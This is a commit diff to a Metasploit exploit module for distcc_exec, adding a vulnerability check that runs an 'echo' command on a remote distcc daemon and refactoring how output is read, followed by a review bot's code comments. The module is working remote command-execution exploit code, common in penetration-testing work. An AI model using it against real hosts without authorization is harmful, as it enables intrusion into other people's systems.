Add a check for distcc_exec

Just executes the exploit with an "echo <random>" payload to see if it
works.
unstable
James Lee 2012-06-18 14:34:02 -06:00
parent 68496d364a
commit 96c16a498a
1 changed files with 35 additions and 12 deletions


@ -63,6 +63,21 @@ class Metasploit3 < Msf::Exploit::Remote
], self.class) ], self.class)
end end
def check
r = rand_text_alphanumeric(10)
connect
sock.put(dist_cmd("sh", "-c", "echo #{r}"))
dtag = rand_text_alphanumeric(10)
sock.put("DOTI0000000A#{dtag}\n")
err, out = read_output
if out.index(r)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit def exploit
connect connect
@ -72,6 +87,21 @@ class Metasploit3 < Msf::Exploit::Remote
dtag = rand_text_alphanumeric(10) dtag = rand_text_alphanumeric(10)
sock.put("DOTI0000000A#{dtag}\n") sock.put("DOTI0000000A#{dtag}\n")
err, out = read_output
(err || "").split("\n") do |line|
print_status("stderr: #{line}")
end
(out || "").split("\n") do |line|
print_status("stdout: #{line}")
end
handler
disconnect
end
def read_output
res = sock.get_once(24, 5) res = sock.get_once(24, 5)
if !(res and res.length == 24) if !(res and res.length == 24)
@ -85,12 +115,9 @@ class Metasploit3 < Msf::Exploit::Remote
res = sock.get_once(8, 5) res = sock.get_once(8, 5)
len = [res].pack("H*").unpack("N")[0] len = [res].pack("H*").unpack("N")[0]
return if not len return [nil, nil] if not len
if (len > 0) if (len > 0)
res = sock.get_once(len, 5) err = sock.get_once(len, 5)
res.split("\n").each do |line|
print_status("stderr: #{line}")
end
end end
# Check STDOUT # Check STDOUT
@ -98,16 +125,12 @@ class Metasploit3 < Msf::Exploit::Remote
res = sock.get_once(8, 5) res = sock.get_once(8, 5)
len = [res].pack("H*").unpack("N")[0] len = [res].pack("H*").unpack("N")[0]
return if not len return [err, nil] if not len
if (len > 0) if (len > 0)
res = sock.get_once(len, 5) out = sock.get_once(len, 5)
res.split("\n").each do |line|
print_status("stdout: #{line}")
end
end end
return [err, out]
handler
disconnect
end end
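Review bot: In the new `check`, `out.index(r)` raises NoMethodError whenever `read_output` hands back a nil stdout, which happens on the `[nil, nil]` and `[err, nil]` returns this commit adds and whenever `get_once` times out, so a host that answers unexpectedly produces an exception instead of a check code. Guard it with `if out && out.index(r)`; what `read_output` returns on its early short-read path is outside the visible lines and should be confirmed to have the same two-element shape. `check` also never calls `disconnect`, so the socket stays open after the probe; a `disconnect` before each return (or in an `ensure`) would close it. Separately, in `exploit` the `.each` was dropped from `(err || "").split("\n") do |line|`; on Ruby versions before 2.6 `String#split` ignores a block, so the stderr/stdout lines would silently stop being printed, and `(err || "").split("\n").each do |line|` keeps the previous behaviour.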